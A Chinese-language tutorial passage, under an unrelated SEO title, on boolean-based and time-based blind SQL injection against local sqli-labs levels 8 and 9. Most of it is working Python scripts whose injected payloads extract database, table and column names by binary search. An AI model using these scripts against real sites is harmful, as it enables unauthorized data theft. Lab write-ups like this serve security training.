电子商务网站建设与维护总结免费网站建设制作

bool盲注

使用场景:

• 当页面不会返回明确的数据库错误信息，但能通过页面内容/状态的差异间接判断SQL语句执行结果时。

原理:

• 攻击者通过构造布尔条件（如 AND 1=1、OR 1=2），观察页面的响应差异。

• 通过逐字符猜测目标数据（如数据库名、表名、字段值），结合二分法或穷举法缩小范围。

案例:

sqli-labs---第八关:通过bool盲注获取数据库名字, 以及其中的表面,和字段名

目标地址:127.0.0.1:8080/less-8/index.php  (本地部署的靶场)

 1.通过脚本获取数据库名

import requestsdef inject_database(url):result = ''for i in range(1, 50):ascii_low = 32ascii_high = 128mid = (ascii_high + ascii_low)//2while ascii_low < ascii_high:payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)res= {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:ascii_low = mid + 1else:ascii_high = midmid = (ascii_low + ascii_high)//2if mid == 32:breakresult += chr(mid)print(result)if __name__ == '__main__':url = "http://127.0.0.1:8080/less-8/index.php"inject_database(url)

 运行结果:

 2. 获取此数据库的所有表名

import requestdef inject_tables(url, database_name):for table_index in range(0, 10):  # 假设最多有10张表result = ''for i in range(1, 50):  # 假设表名长度不超过50个字符ascii_low = 32ascii_high = 128mid = (ascii_high + ascii_low) // 2while ascii_low < ascii_high:# 修改payload以查询表名，并调整LIMIT的offsetpayload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit {table_index},1), {i}, 1)) > {mid}-- "res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:ascii_low = mid + 1else:ascii_high = midmid = (ascii_low + ascii_high) // 2if mid == 32:breakresult += chr(mid)print(result)if result:  # 表存在print("---------------------")else:break  # 如果没有更多的表，退出循环if __name__ == '__main__':url = "http://127.0.0.1:8080/less-8/index.php"#inject_database(url)inject_tables(url,"security")

 3.获取users表中的所有列名

import request
def inject_columns(url, database_name, table_name):for column_index in range(0, 10):  # 假设最多有10列result = ''for i in range(1, 50):  # 假设列名长度不超过50个字符ascii_low = 32ascii_high = 128mid = (ascii_high + ascii_low) // 2while ascii_low < ascii_high:# 修改payload以查询列名，并调整LIMIT的offsetpayload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}'  limit {column_index},1), {i}, 1)) > {mid}-- "res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:ascii_low = mid + 1else:ascii_high = midmid = (ascii_low + ascii_high) // 2if mid == 32:breakresult += chr(mid)print(result)if result:  # 列存在print("---------------------")else:break  # 如果没有更多的列，退出循环if __name__ == '__main__':url = "http://127.0.0.1:8080/less-8/index.php"#inject_database(url)#inject_tables(url,"security")inject_columns(url,"security","users")

 这三者主要就是修改一下payload,代码很简单, 主要是二分查找与sql语句.

时间盲注

使用场景:

• 当页面完全无任何回显差异（内容、状态码均无变化），但数据库支持时间延迟函数时。

原理:

• 攻击者注入包含时间延迟函数的SQL语句（如 SLEEP()、BENCHMARK()），通过响应时间差异判断条件真假。

• 通过条件语句控制延迟是否触发，逐位提取数据。

案例:

sqli-labs---第九关:通过时间盲注获取数据库名字, 以及其中的表面,和字段名

目标: http://127.0.0.1:8080/less-9/index.php?id=1

页面回显无法通过比较判断,支持sleep()函数, 所以用时间盲注

1.获取数据库名

相比bool盲注, sql主要是用if,sleep(),python代码用了time函数

import time
import requestsdef inject_database(url):result = ''for i in range(1, 50):ascii_low = 32ascii_high = 128mid = (ascii_high + ascii_low) // 2while ascii_low < ascii_high:payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(2), 0)-- " % (i, mid)res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)end_time = time.time()res_time = end_time - start_timeif res_time >= 2:ascii_low = mid + 1else:ascii_high = midmid = (ascii_low + ascii_high) // 2if mid == 32:breakresult += chr(mid)print(result)if __name__ == '__main__':url = 'http://127.0.0.1:8080/less-9/index.php'inject_database(url)

2.获取表名

import time
import requestsdef  inject_table(url, database_name):for table_index in range(0, 10):  # 假设最多有10张表result = ''for i in range(1, 50):  # 假设表名长度不超过50个字符ascii_low = 32ascii_high = 128mid = (ascii_high + ascii_low) // 2while ascii_low < ascii_high:# 修改payload以查询表名，并调整LIMIT的offsetpayload = f"1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit {table_index},1), {i}, 1)) > {mid}, sleep(2), 0)-- "res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)res_time = time.time() - start_timeif res_time > 2:ascii_low = mid + 1else:ascii_high = midmid = (ascii_low + ascii_high) // 2if mid == 32:breakresult += chr(mid)print(result)if result:  # 表存在print("---------------------")else:break  # 如果没有更多的表，退出循环if __name__ == '__main__':url = 'http://127.0.0.1:8080/less-9/index.php'#inject_database(url)inject_table(url,'security')

速度很慢 

3.获取emails表中的所有字段名

import time
import requestsdef inject_columns(url, database_name, table_name):for column_index in range(0, 10):  # 假设最多有10列result = ''for i in range(1, 50):  # 假设列名长度不超过50个字符ascii_low = 32ascii_high = 128mid = (ascii_high + ascii_low) // 2while ascii_low < ascii_high:# 修改payload以查询列名，并调整LIMIT的offsetpayload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}'  limit {column_index},1), {i}, 1)) > {mid}, sleep(2), 0)-- "res = {"id": payload}s_time = time.time()r = requests.get(url, params=res)r_time = time.time() - s_timeif r_time>2:ascii_low = mid + 1else:ascii_high = midmid = (ascii_low + ascii_high) // 2if mid == 32:breakresult += chr(mid)print(result)if result:  # 列存在print("---------------------")else:break  # 如果没有更多的列，退出循环if __name__ == '__main__':url = 'http://127.0.0.1:8080/less-9/index.php'#inject_database(url)#inject_table(url,'security')inject_columns(url,'security','emails')

就此,时间盲注和bool盲注结束